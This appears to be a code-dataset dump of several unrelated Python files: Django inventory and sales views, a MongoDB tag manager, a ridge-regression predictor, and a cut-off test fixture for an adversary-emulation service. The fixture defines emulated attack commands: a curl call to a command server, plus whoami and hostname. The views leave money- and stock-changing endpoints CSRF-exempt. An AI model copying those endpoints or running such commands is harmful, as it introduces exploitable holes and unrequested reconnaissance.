csv_file:\n\t\n\n\tcsv_file=request.FILES['file']\n\tprint(csv_file.name.endswith('csv'))\n\n\tfile_data=csv_file.read().decode('utf-8')\n\tlines=file_data.split('\\n')\n\t# line_dict=get_lines_dict(lines)\n\n\t# work on this function so as to allow flexibility of csv upload\n\n\tfor counter, line in enumerate(lines):\n\t\tif counter == 0:\n\t\t\tcontinue\n\t\tfields=line.split(',')\n\t\t\n\t\tif(len(fields)<3):\n\t\t\tprint(fields)\n\t\telse:\n\t\t\tprint(counter)\n\t\t\ttry:\n\n\t\t\t\texistimg_customer,new_customer=Customer.objects.get_or_create(company=Company.objects.get(id=request.POST['company']),customer_name=fields[0],customer_phone=fields[2],customer_location=fields[1])\n\t\t\texcept Exception as e:\n\t\t\t\tprint('error: {}'.format(e))\n\t\t\t\tcontinue\n\t\t\t# new_customer.save()\n\tprint(\"Done, customers stored\")\n\treturn HttpResponse('ok')\n\t\ndef get_lines_dict(file_lines):\n\tatributes_dict={}\n\tlines_dict={}\n\tfor index,line in enumerate(file_lines):\n\t\tif index == 0:\n\t\t\tfields = line.split(',')\n\t\t\tfor pos,field in 
enumerate(fields):\n\t\t\t\tatributes_dict[pos]=field\n\t\t\t\tlines_dict[field]=[]\n\n\t\t\tbreak\n\n\t\n\tfor index,line in enumerate(file_lines):\n\t\tif index != 0:\n\t\t\tcells = line.split(',')\n\n\t\t\tfor pos,cell in enumerate(cells):\n\t\t\t\tif len(cell)>1:\n\t\t\t\t\tlines_dict[atributes_dict[pos]].append(cell)\n\n\n\t\t\t\t\n\tprint(lines_dict)\n\treturn lines_dict\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef increaseAccount(request,*args,**kargs):\n\taccount=Account.objects.filter(id=kargs['id'])\n\taccount.update(account_amount=float(account.first().account_amount)+float(kargs['amount']))\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef decreaseAccount(request,*args,**kargs):\n\taccount=Account.objects.filter(id=kargs['id'])\n\taccount.update(account_amount=float(account.first().account_amount)-float(kargs['amount']))\n\treturn HttpResponse('ok')\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef updateUpDownAccount(request,*args,**kargs):\n\texpense=Expense.objects.filter(id=kargs['id'])\n\n\taccount=Account.objects.filter(id=expense.first().expense_account.id)\n\taccount.update(account_amount=float(account.first().account_amount)-(float(kargs['amount'])-float(expense.first().expense_amount)))\n\tprint('current expense amount')\n\tprint(float(expense.first().expense_amount))\n\tprint('entered value')\n\tprint(float(kargs['amount']))\n\tprint('balance')\n\tprint(float(account.first().account_amount))\n\tprint('adjusted balance')\n\tadjustedval=float(account.first().account_amount)-(float(kargs['amount'])-float(expense.first().expense_amount))\n\tprint(adjustedval)\n\tprint(kargs['id'])\n\n\t# print(request.POST)\n\treturn HttpResponse(adjustedval)\n\n@csrf_exempt\n@login_required(login_url='/login/')\t\ndef increseItem(request,*args,**kargs):\n\titem=Item.objects.filter(id=kargs['id'])\n\titem.update(item_size=float(item.first().item_size)+float(kargs['quantity']))\n\treturn HttpResponse('ok')\n\t\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef decreaseItem(request,*args,**kargs):\n\titem=Item.objects.filter(id=kargs['id'])\n\titem.update(item_size=float(item.first().item_size)-float(kargs['quantity']))\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef AcceptSale(request,*args,**kargs):\n\t\n\tsale=Sales.objects.filter(id=kargs['id'])\n\tupdatesale=sale.update(sales_received=True)\n\t# updating the quantity of item sold \n\n\titem=Item.objects.filter(id=sale.first().item.id)\n\titem.update(item_size=item.first().item_size-sale.first().sales_quantity)\n\n\tprint(kargs['id'])\n\t# print(request.POST)\n\treturn HttpResponse('ok')\n\n# remember: the best way to implement sale orders and loan handling is a whole new order table linked to the sales table\n# for the sake of time and convenience, a workaround is implemented by navigating some boolean fields in the sales table; a payment method column and a balance column were added for this exact purpose\n# in future a much simpler implementation should eliminate this processing bottleneck\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef restoreCustomerCredit(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\tsale=Sales.objects.get(id=kargs['saleid'])\n\n\t# if the customer has a credit balance\n\t# you can restore the amount\n\tif (sale.sales_piad_with_customer_credit):\n\t\tprint(\"credit restore 
amount\")\n\t\tprint(round(float(kargs['amount'])))\n\t\tcustomer.customer_debit_amount+=round(float(kargs['amount']))\n\t\tcustomer.save()\n\n\n\treturn HttpResponse('ok')\n\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef UpdateCustomerSalesPaymentMethodAuth(request,*args,**kargs):\n\t# customer loan acceptance code\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\t# note cash here means the payment method\n\tprint(\"method:\"+kargs['cash'])\n\n\tcustomer_loan_order=Sales.objects.filter(customer=customer,sales_method_payment=\"loan\")\n\n\tcustomer_order_loan_balance=customer_loan_order.aggregate(Sum('sales_balance'))['sales_balance__sum']\n\n\tnumber_of_sales_in_orders=customer_loan_order.count()\n\n\tdef isCreditFree(amountpaid,totalbalance):\n\t\tfree =False\n\t\textra_cash_paid=0\n\t\tif amountpaid >= round(totalbalance):\n\t\t\tfree=True\n\t\t\textra_cash_paid=amountpaid-round(totalbalance)\n\t\treturn [free,extra_cash_paid]\n\n\tif isCreditFree(float(kargs['amount']),customer_order_loan_balance)[0]:\n\t\tupdatedsales=customer_loan_order.update(sales_method_payment=kargs['cash'],sales_balance=F('sales_amount'))\n\n\t\t# record that customer has paid extra\n\n\t\t# adding current extra customer amount to the new extra \n\t\tcustomer.customer_debit_amount+=isCreditFree(float(kargs['amount']),customer_order_loan_balance)[1]\n\t\tcustomer.save()\n\n\t\tprint('no more loan')\n\telse:\n\t\tcurrent_balance=round(customer_order_loan_balance)-float(kargs['amount'])\n\t\t# the actual hack\n\t\t# i save the total loan balance in each order item equally distributing it, for later reconstruction\n\t\tbalance_per_sale=current_balance/number_of_sales_in_orders\n\n\t\tupdatedsales=customer_loan_order.update(sales_balance=balance_per_sale)\n\t\tprint('balance to be paid')\n\t\tprint(current_balance)\n\t\tprint('updated balance')\n\t\tprint(balance_per_sale)\n\t\tprint('updated end')\n\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef UpdateSalesPaymentMethodAuth(request,*args,**kargs):\n\tprint('taking loan')\n\tsale=Sales.objects.get(id=kargs['saleid'])\n\tprint('amount paid')\n\tprint(float(kargs['amount']))\n\tbalance=sale.sales_balance-float(kargs['amount'])\n\tsale.sales_balance=balance\n\tprint('balance')\n\tprint(balance)\n\tif balance<=0:\n\t\tsale.sales_method_payment=kargs['cash']\n\n\tsale.save()\n\t# updating the quantity of item sold \n\tprint(kargs['saleid'])\n\t# print(request.POST)\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef UpdateSalesPaymentMethod(request,*args,**kargs):\n\tprint('geting single loan')\n\tsale=Sales.objects.filter(id=kargs['saleid'])\n\tamount=0\n\tupdatesale=sale.update(sales_method_payment=kargs['cash'],sales_balance=F('sales_amount'))\n\n\t# updating the quantity of item sold \n\tprint(kargs['saleid'])\n\t# print(request.POST)\n\treturn HttpResponse('ok')\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef UpdateCustomerSalesPaymentMethod(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\tamount=0\n\tprint('multiplesss...')\n\tprint(kargs['cash'])\n\n\t# begin handling of customer credit balance\n\n\tif customer.customer_debit_amount>0:\n\t\t# custoemr has credit balance\n\n\t\t# getting total sales for a customer's order\n\t\tcustomer_total_order=Sales.objects.filter(customer=customer,sales_received=False).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\n\t\t# deducting the credit balance from amount paid for 
the order\n\n\t\tcustomer_total_order-=customer.customer_debit_amount\n\n\t\t# getting total number of items within the customer order\n\t\tnumber_of_items_in_order=Sales.objects.filter(customer=customer,sales_received=False).count()\n\n\t\tif customer_total_order <0:\n\t\t\t# customer still has credit balance\n\t\t\tcustomer.customer_debit_amount=(-1)*customer_total_order\n\t\t\t# reseting the customer total order\n\t\t\tcustomer_total_order=0\n\n\t\t\t# update each individual sales balance to zero\n\t\t\tupdatesale=Sales.objects.filter(customer=customer,sales_received=False).update(sales_method_payment=kargs['cash'],sales_balance=0,sales_piad_with_customer_credit=True)\n\t\t\tprint(\"customer credit remains: \",customer_total_order*-1)\n\n\t\telse:\n\t\t\t# customer no longer has credit balance\n\t\t\tcustomer.customer_debit_amount=0\n\n\t\t\t# to store the order amount modified by the credit balance, we split the resultant amount into individual units and stroe each unit balance into respective sale within the customers order\n\t\t\t\n\t\t\tbalance_per_item=round(customer_total_order/number_of_items_in_order)\n\n\t\t\t# update the customer sales order with this neer balnce on each item within the order\n\n\t\t\tupdatesale=Sales.objects.filter(customer=customer,sales_received=False).update(sales_method_payment=kargs['cash'],sales_balance=balance_per_item,sales_piad_with_customer_credit=True)\n\n\t\t\tprint(\"balance per item \", balance_per_item)\n\n\t\tcustomer.save()\n\n\telse:\n\t\tupdatesale=Sales.objects.filter(customer=customer,sales_received=False).update(sales_method_payment=kargs['cash'],sales_balance=F('sales_amount'))\n\n\t\t\n\t# end handling of credit balance\n\t\n\treturn HttpResponse('ok')\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef AuthorizeCustomerOrder(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\n\tsale=Sales.objects.filter(customer=customer,sales_received=True,sales_authorized=False).update(sales_authorized=True,adminuser=request.user.id)\n\n\treturn HttpResponse('ok')\n\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef AuthorizeSale(request,*args,**kargs):\n\t\n\tsale=Sales.objects.filter(id=kargs['id'])\n\tupdatesale=sale.update(sales_authorized=True,adminuser=request.user.id)\n\n\t# updating the quantity of item sold \n\tprint(kargs['id'])\n\t# print(request.POST)\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef IssueCustomerOrder(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\n\tsale=Sales.objects.filter(customer=customer,sales_authorized=True,sales_issue_item=False).update(sales_issue_item=True,issueuser=request.user.id)\n\n\treturn HttpResponse('ok')\n\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef IssueSale(request,*args,**kargs):\n\t\n\tsale=Sales.objects.filter(id=kargs['id'])\n\tupdatesale=sale.update(sales_issue_item=True,issueuser=request.user.id)\n\n\t# updating the quantity of item sold \n\tprint(kargs['id'])\n\t# print(request.POST)\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef AcceptCustomerOder(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\tsales=Sales.objects.filter(sales_received=False,customer=customer)\n\tif sales.exists() and sales.count()>=1:\n\t\tfor sale in sales:\n\t\t\tsale.sales_received=True\n\t\t\tsale.save()\n\t\t\t# updating the quantity of item sold 
\n\t\t\titem=Item.objects.filter(id=sale.item.id)\n\t\t\titem.update(item_size=item.first().item_size-sale.sales_quantity)\n\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef AcceptSaleAll(request,*args,**kargs):\n\tsales=Sales.objects.filter(sales_received=False)\n\tif sales.exists() and sales.count()>=1:\n\t\tfor sale in sales:\n\t\t\tsale.sales_received=True\n\t\t\tsale.save()\n\t\t\t# updating the quantity of item sold \n\t\t\titem=Item.objects.filter(id=sale.item.id)\n\t\t\titem.update(item_size=item.first().item_size-sale.sales_quantity)\n\n\treturn HttpResponse('ok')\n\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef DeclineCustomerOder(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\tsales=Sales.objects.filter(sales_received=False,customer=customer)\n\tif sales.exists() and sales.count()>=1:\n\t\tfor sale in sales:\n\t\t\t# updating the quantity of item sold \n\t\t\titem=Item.objects.filter(id=sale.item.id)\n\t\t\titem.update(item_size=item.first().item_size+sale.sales_quantity)\n\t\n\tSales.objects.filter(sales_received=False,customer=customer).delete()\n\t\n\treturn HttpResponse('ok')\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef DeclineSaleAll(request,*args,**kargs):\n\tsales=Sales.objects.filter(sales_received=False)\n\tif sales.exists() and sales.count()>=1:\n\t\tfor sale in sales:\n\t\t\t# updating the quantity of item sold \n\t\t\titem=Item.objects.filter(id=sale.item.id)\n\t\t\titem.update(item_size=item.first().item_size+sale.sales_quantity)\n\t\n\tSales.objects.filter(sales_received=False).delete()\n\t\n\treturn HttpResponse('ok')\n\nclass MyView(View):\n\tdef get(self,request,*args,**kagrs):\n\t\treturn HttpResponse('hello CBV')\n\n\tdef post(self,request,*args,**kagrs):\n\t\tprint(request.POST['customer'])\n\t\titem=Item.objects.filter(id=request.POST['item'])\n\t\tcustomer=Customer.objects.filter(id=1)\n\t\tsale_order=Sales.objects.create(sales_quantity=request.POST['sales_quantity'],sales_amount=request.POST['sales_amount'],item=item,user=request.user,customer=customer)\n\n\t\tsale_order.save()\n\t\treturn HttpResponse('ok')\n\n\n\nclass HomePage(LoginRequiredMixin,View):\n\tlogin_url = '/login/'\n\tdef get(self,request,*args,**kagrs):\n\t\tform=ItemForm()\n\n\t\tuser = request.user\n\t\t# home page limited to only admin 1 and 2\n\t\tif request.user.employee.employee_privillage <= privillage['assistantadmin']:\n\t\t\treturn render(request,'home/base.html',{'form':form,'user':user})\n\t\telse:\n\t\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\n\n\n\n@login_required(login_url='/login/')\ndef ViewOrder(request,*args,**kargs):\n\n\tuser = request.user\n\t# access to the order/sales page limited to admin 1 and 2 and sales person 3\n\tif request.user.employee.employee_privillage <= privillage['assistantadmin'] or request.user.employee.employee_privillage == privillage['sales']:\n\t\treturn render(request,'inventory/homepage.html',{'user':user})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\t\t\n\n@login_required(login_url='/login/')\ndef ViewProduct(request,*args,**kargs):\n\tuser = request.user\n\t\n\t# access to item creation page limited to admin 1 and 2\n\tif request.user.employee.employee_privillage <= privillage['assistantadmin']:\n\t\treturn render(request,'inventory/product.html',{'user':user})\n\telse:\n\t\treturn 
redirect(pathselector[request.user.employee.employee_privillage])\n\n\n\n@login_required(login_url='/login/')\ndef ViewCustomer(request,*args,**kargs):\n\tuser = request.user\n\t# access to the order/sales page limited to admin 1 and 2 and sales person 3\n\tif request.user.employee.employee_privillage <= privillage['assistantadmin'] or request.user.employee.employee_privillage == privillage['sales']:\n\t\treturn render(request,'inventory/customer.html',{'user':user})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\n\n@login_required(login_url='/login/')\ndef ViewCounter(request,*args,**kargs):\n\n\tuser = request.user\n\t\n\t# access to item inventory/godown page limited to admin 1 and 2\n\tif request.user.employee.employee_privillage <= privillage['assistantadmin'] or request.user.employee.employee_privillage == privillage['godown']:\n\t\treturn render(request,'inventory/inventory.html',{'user':user})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\n@login_required(login_url='/login/')\ndef ViewSettings(request,*args,**kargs):\n\n\t# less than 2 is admin\n# just testing \n# real <=2 i.e <= ssistantadmin\n\tif request.user.employee.employee_privillage <=privillage['assistantadmin']:\n\t\treturn render(request,'inventory/settings.html',{})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\n@login_required(login_url='/login/')\ndef ViewExpense(request,*args,**kargs):\n\n\tuser = request.user\n\t\n\t# access to item inventory/godown page limited to admin 1 and 2\n\tif request.user.employee.employee_privillage <= privillage['assistantadmin'] or request.user.employee.employee_privillage == privillage['bursar']:\n\t\treturn render(request,'inventory/bursar.html',{'user':user})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n@login_required(login_url='/login/')\ndef ViewProfile(request,*args,**kargs):\n\tuser = request.user\n\t\n\treturn render(request,'inventory/profile.html',{'user':user})\n\t\n\t\ndef ViewLogin(request,*args,**kargs):\n\tform=ItemForm()\n\tif(request.method=='POST'):\n\n\t\tusername = request.POST['username']\n\t\tpassword = request.POST['password']\n\t\tuser = authenticate(request, username=username, password=password)\n\n\t\tif user is not None:\n\n\t\t login(request, user)\n\n\t\t # logout(request)\n\t\t return redirect('base')\n\n\t\telse:\n\t\t\treturn render(request,'inventory/login.html',{})\t\n\n\telif(request.method=='GET'):\n\t\tlogout(request)\n\t\treturn render(request,'inventory/login.html',{'form':form})\t\t\n\n\n@login_required(login_url='/login/')\ndef ViewAuthorize(request,*args,**kargs):\n\n\t# less than 2 is admin\n\n\tif request.user.employee.employee_privillage <=privillage['assistantadmin']:\n\t\treturn render(request,'inventory/authorize.html',{})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\n\n\n# print(args)\n\t# print(kagrs)\n\n\t# method one\n\t# try :\n\t# \tobj = Item.objects.get(color=kagrs['color'])\n\t# except:\n\t# \tobj=Item.objects.all().first()\n\n\t# method 2\n\t# qs=Item.objects.filter(color=kagrs['color'])\n\t# if qs.exists() and qs.count()>=1:\n\t# \tobj=qs.first()\n\t\n\t# method 3\n\t# obj=get_object_or_404(Item,id=color)\n\t# obj_color=obj.item_name\n\t# # print(request.method)\n\t# sales=Sales.objects.filter(id=request.POST['id'])\n\t\n\n\n\n\t\t# sales=Sales.objects.filter(sales_received=False)\n\t# if sales.exists() and 
sales.count()>=1:\t\n\t# \tfor sale in sales:\n\t# \t\tsale.update(sales_received=True)\n\t# else:\n\t# \tsales.update(sales_received=True)\n\n\n\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"345305294","text":"import lib.util as util\nfrom lib import config\nfrom lib import mongo_util\nfrom lib.string_const import COMMON_STRING\nfrom lib.string_const import DB_STRING\nall_script_collection = mongo_util.get_collection(DB_STRING.DB_NAME, DB_STRING.TABLE_ALL_TAG)\nscript_tag_collection = mongo_util.get_collection(DB_STRING.DB_NAME, DB_STRING.TABLE_SCRIPT_TAG)\n\n\ndef add_script_tag(name, platform, tag):\n result = None\n post_insert = {'name': name, 'platform': platform, 'tags': tag}\n result_find = mongo_util.find_one(script_tag_collection, name=name, platform=platform)\n if not result_find:\n mongo_util.insert_one(script_tag_collection, post_insert)\n result = 'Success: Add Tag\"' + tag + '\"!'\n else:\n tags = result_find['tags']\n tag_list = tags.split(',')\n if tag in tag_list:\n return 'Error: Tag \" ' + tag + '\" already exists!'\n if tags == '':\n tags = tag\n else:\n tags = tags + ',' + tag\n post_script = {'$set': {'tags': tags}}\n mongo_util.update_one(script_tag_collection, post_script, name=name, platform=platform)\n result = 'Success: Add Tag\" ' + tag + '\"!'\n return result\n\n\ndef delete_script_tag(name, tag, platform):\n result = None\n result_find = mongo_util.find_one(script_tag_collection, name=name, platform=platform)\n if result_find:\n tags = result_find['tags']\n tag_list = tags.split(',')\n tags_new = ''\n if tag in tag_list:\n tag_list.remove(tag)\n for tag in tag_list:\n if tags_new == '':\n tags_new = tag\n else:\n tags_new = tags_new + ',' + tag\n post_script = {'$set': {'tags': tags_new}}\n result = mongo_util.update_one(script_tag_collection, post_script, name=name, platform=platform)\n\n\ndef add_to_all_tags(tag):\n result_find = mongo_util.find_one(all_script_collection)\n if not result_find:\n post_insert = {'tags': tag}\n mongo_util.insert_one(all_script_collection, post_insert)\n return COMMON_STRING.DONE\n else:\n tags = result_find['tags']\n tags_list = tags.split(',')\n if tag in tags_list:\n return '\"' + tag + '\" already exists!'\n tags = tags + ',' + tag\n post_tags = {'$set': {'tags': tags}}\n mongo_util.update_one(all_script_collection, post_tags)\n return COMMON_STRING.DONE\n\n\ndef get_abandoned_tags():\n result_find = mongo_util.find_one(all_script_collection)\n abandon_list = []\n if not result_find:\n return ''\n tags = result_find['tags']\n tags_list = tags.split(',')\n for tag in tags_list:\n if not is_using_tag(tag):\n abandon_list.append(tag)\n return abandon_list\n\n\ndef delete_one_tag(tag_name):\n result_find = mongo_util.find_one(all_script_collection)\n if not result_find:\n return 'Cannot Find Tags !'\n tags = result_find['tags']\n tags_list = tags.split(',')\n tags_list.remove(tag_name)\n tags_new = ''\n for tag in tags_list:\n if tags_new == '':\n tags_new = tag\n else:\n tags_new = tags_new + ',' + tag\n post_tags = {'$set': {'tags': tags_new}}\n mongo_util.update_one(all_script_collection, post_tags)\n return 'Success: Delete Tag\"' + tag_name + '\" !'\n\n\ndef delete_abandoned_tags():\n result_find = mongo_util.find_one(all_script_collection)\n if not result_find:\n return 'Cannot Find Tags !'\n tags = result_find['tags']\n tags_list = tags.split(',')\n tags_list_iterator = 
tags_list.copy()\n for tag in tags_list_iterator:\n if not is_using_tag(tag):\n tags_list.remove(tag)\n tags_new = ''\n for tag in tags_list:\n if tags_new == '':\n tags_new = tag\n else:\n tags_new = tags_new + ',' + tag\n post_tags = {'$set': {'tags': tags_new}}\n mongo_util.update_one(all_script_collection, post_tags)\n return 'Success: Delete Abadoned Tags !'\n\n\ndef is_using_tag(tag_name):\n result_find = mongo_util.find(script_tag_collection)\n if not result_find:\n return False\n for rel in result_find:\n if not rel['tags']:\n continue\n list_tags = rel['tags'].split(',')\n if tag_name in list_tags:\n return True\n return False\n\n\ndef get_all_tags():\n result = mongo_util.find_one(all_script_collection)\n if result:\n return result['tags'].split(',')\n else:\n return ''\n\n\ndef get_script_tags(script_name=None, platform=None):\n if script_name:\n result = mongo_util.find_one(script_tag_collection, name=script_name, platform=platform)\n if result:\n if result['tags']:\n return result['tags'].split(',')\n else:\n return None\n else:\n dict_result = []\n result = mongo_util.find(script_tag_collection)\n if result:\n for rel in result:\n list_tags = rel['tags'].split(',')\n dict_result.append([rel['name'], list_tags])\n return dict_result\n return None\n","sub_path":"server/extend/tag_manager/tag_manager.py","file_name":"tag_manager.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"299908428","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Predict relative engagement from content, with ridge regression.\n\nTime: ~2M\n\"\"\"\n\nfrom __future__ import division, print_function\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '../'))\nimport time, datetime\nimport numpy as np\n\nfrom utils.helper import write_dict_to_pickle\nfrom utils.ridge_regressor import RidgeRegressor\n\n\ndef _load_data(filepath):\n \"\"\"Load features space for content predictor.\"\"\"\n matrix = []\n vids = []\n with open(filepath, 'r') as fin:\n fin.readline()\n for line in fin:\n row = np.zeros(1+2+category_cnt+lang_cnt+1)\n vid, publish, duration, definition, category, detect_lang, _, _, _, _, _, re30, _ = line.rstrip().split('\\t', 12)\n vids.append(vid)\n row[0] = np.log10(int(duration))\n if definition == '0':\n row[1] = 1\n else:\n row[2] = 1\n row[3+category_dict[category]] = 1\n row[3+category_cnt+lang_dict[detect_lang]] = 1\n row[-1] = float(re30)\n matrix.append(row)\n print('>>> Finish loading file {0}!'.format(filepath))\n return matrix, vids\n\n\nif __name__ == '__main__':\n # == == == == == == == == Part 1: Set up experiment parameters == == == == == == == == #\n start_time = time.time()\n\n category_dict = {'1': 0, '2': 1, '10': 2, '15': 3, '17': 4, '19': 5, '20': 6, '22': 7, '23': 8, '24': 9,\n '25': 10, '26': 11, '27': 12, '28': 13, '29': 14, '30': 15, '43': 16, '44': 17}\n category_cnt = len(category_dict)\n lang_dict = {'af': 0, 'ar': 1, 'bg': 2, 'bn': 3, 'ca': 4, 'cs': 5, 'cy': 6, 'da': 7, 'de': 8, 'el': 9, 'en': 10,\n 'es': 11, 'et': 12, 'fa': 13, 'fi': 14, 'fr': 15, 'gu': 16, 'he': 17, 'hi': 18, 'hr': 19, 'hu': 20,\n 'id': 21, 'it': 22, 'ja': 23, 'kn': 24, 'ko': 25, 'lt': 26, 'lv': 27, 'mk': 28, 'ml': 29, 'mr': 30,\n 'ne': 31, 'nl': 32, 'no': 33, 'pa': 34, 'pl': 35, 'pt': 36, 'ro': 37, 'ru': 38, 'sk': 39, 'sl': 40,\n 'so': 41, 'sq': 42, 'sv': 43, 'sw': 44, 'ta': 45, 'te': 46, 'th': 47, 'tl': 48, 'tr': 49, 'uk': 50,\n 'ur': 51, 'vi': 52, 'zh-cn': 
53, 'zh-tw': 54, 'NA': 55}\n lang_cnt = len(lang_dict)\n\n # == == == == == == == == Part 2: Load dataset == == == == == == == == #\n data_loc = '../../production_data/tweeted_dataset_norm'\n train_loc = os.path.join(data_loc, 'train_data')\n test_loc = os.path.join(data_loc, 'test_data')\n\n print('>>> Start to load training dataset...')\n train_matrix = []\n for subdir, _, files in os.walk(train_loc):\n for f in files:\n train_matrix.extend(_load_data(os.path.join(subdir, f))[0])\n train_matrix = np.array(train_matrix)\n\n print('>>> Start to load test dataset...')\n test_matrix = []\n test_vids = []\n for subdir, _, files in os.walk(test_loc):\n for f in files:\n matrix, vids = _load_data(os.path.join(subdir, f))\n test_matrix.extend(matrix)\n test_vids.extend(vids)\n test_matrix = np.array(test_matrix)\n\n print('>>> Finish loading all data!\\n')\n\n # predict test data from customized ridge regressor\n test_yhat = RidgeRegressor(train_matrix, test_matrix).predict()\n\n # get running time\n print('\\n>>> Total running time: {0}'.format(str(datetime.timedelta(seconds=time.time() - start_time)))[:-3])\n\n # write to pickle file\n to_write = True\n predict_result_dict = {vid: pred for vid, pred in zip(test_vids, test_yhat)}\n if to_write:\n print('>>> Prepare to write to pickle file...')\n print('>>> Number of videos in final test result dict: {0}'.format(len(predict_result_dict)))\n write_dict_to_pickle(dict=predict_result_dict, path='./output/content_predictor.p')\n","sub_path":"re_regressors/content_predictor.py","file_name":"content_predictor.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"508907370","text":"import pytest\n\nfrom app.objects.c_ability import Ability\nfrom app.objects.c_agent import Agent\nfrom app.objects.c_adversary import Adversary\nfrom app.objects.c_obfuscator import Obfuscator\nfrom app.objects.c_operation import Operation\nfrom app.objects.c_objective import Objective\nfrom app.objects.secondclass.c_executor import Executor\nfrom app.objects.secondclass.c_goal import Goal\nfrom app.objects.c_planner import Planner\nfrom app.objects.c_source import Source\nfrom app.utility.base_world import BaseWorld\n\n\n@pytest.fixture\nasync def setup_rest_svc_test(data_svc):\n BaseWorld.apply_config(name='main', config={'app.contact.http': '0.0.0.0',\n 'plugins': ['sandcat', 'stockpile'],\n 'crypt_salt': 'BLAH',\n 'api_key': 'ADMIN123',\n 'encryption_key': 'ADMIN123',\n 'exfil_dir': '/tmp'})\n await data_svc.store(\n Ability(ability_id='123', name='testA', executors=[\n Executor(name='psh', platform='windows', command='curl #{app.contact.http}')\n ])\n )\n await data_svc.store(\n Ability(ability_id='456', name='testB', executors=[\n Executor(name='sh', platform='linux', command='whoami')\n ])\n )\n await data_svc.store(\n Ability(ability_id='789', name='testC', executors=[\n Executor(name='sh', platform='linux', command='hostname')\n ])\n )\n adversary = Adversary(adversary_id='123', name='test', description='test', atomic_ordering=[])\n await data_svc.store(adversary)\n\n agent = Agent(paw='123', sleep_min=2, sleep_max=8, watchdog=0, executors=['pwsh', 'psh'], platform='windows')\n await data_svc.store(agent)\n\n await data_svc.store(\n Objective(id='495a9828-cab1-44dd-a0ca-66e58177d8cc', name='default', goals=[Goal()])\n )\n\n await data_svc.store(\n Planner(planner_id='123', name='test', module='test', params=dict())\n )\n\n source = Source(id='123', name='test', facts=[], 
adjustments=[])\n await data_svc.store(source)\n\n await data_svc.store(\n Operation(name='test', agents=[agent], adversary=adversary, id='123', source=source)\n )\n\n await data_svc.store(\n Obfuscator(name='plain-text',\n description='Does no obfuscation to any command, instead running it in plain text',\n module='plugins.stockpile.app.obfuscators.plain_text')\n )\n\n\n@pytest.mark.usefixtures(\n \"setup_rest_svc_test\"\n)\nclass TestRestSvc:\n\n def test_delete_operation(self, event_loop, rest_svc, data_svc):\n # PART A: Create an operation\n expected_operation = {'name': 'My Test Operation',\n 'adversary': {'description': 'an empty adversary profile', 'name': 'ad-hoc',\n 'adversary_id': 'ad-hoc', 'atomic_ordering': [],\n 'objective': '495a9828-cab1-44dd-a0ca-66e58177d8cc',\n 'tags': [], 'has_repeatable_abilities': False, 'plugin': None}, 'state': 'finished',\n 'planner': {'name': 'test', 'description': None, 'module': 'test',\n 'stopping_conditions': [], 'params': {}, 'allow_repeatable_abilities': False,\n 'ignore_enforcement_modules': [], 'id': '123', 'plugin': ''}, 'jitter': '2/8',\n 'host_group': [{'trusted': True, 'architecture': 'unknown', 'watchdog': 0,\n 'contact': 'unknown', 'username': 'unknown', 'links': [], 'sleep_max': 8,\n 'exe_name': 'unknown', 'executors': ['pwsh', 'psh'], 'ppid': 0,\n 'sleep_min': 2, 'server': '://None:None', 'platform': 'windows',\n 'host': 'unknown', 'paw': '123', 'pid': 0,\n 'display_name': 'unknown$unknown', 'group': 'red', 'location': 'unknown',\n 'privilege': 'User', 'proxy_receivers': {}, 'proxy_chain': [],\n 'origin_link_id': '', 'deadman_enabled': False,\n 'available_contacts': ['unknown'], 'pending_contact': 'unknown',\n 'host_ip_addrs': [], 'upstream_dest': '://None:None'}],\n 'visibility': 50, 'autonomous': 1, 'chain': [], 'auto_close': False,\n 'obfuscator': 'plain-text', 'use_learning_parsers': False,\n 'group': '',\n 'source': '',\n 'objective': 